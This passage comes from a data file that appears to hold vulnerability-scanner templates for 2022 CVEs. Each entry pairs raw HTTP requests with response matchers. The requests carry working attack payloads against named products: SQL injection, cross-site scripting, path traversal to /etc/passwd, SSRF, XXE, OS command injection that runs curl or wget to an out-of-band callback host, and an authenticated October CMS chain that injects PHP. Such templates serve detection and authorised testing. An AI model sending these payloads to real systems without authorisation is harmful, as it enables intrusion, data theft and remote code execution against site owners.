application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28022","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-31981","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login 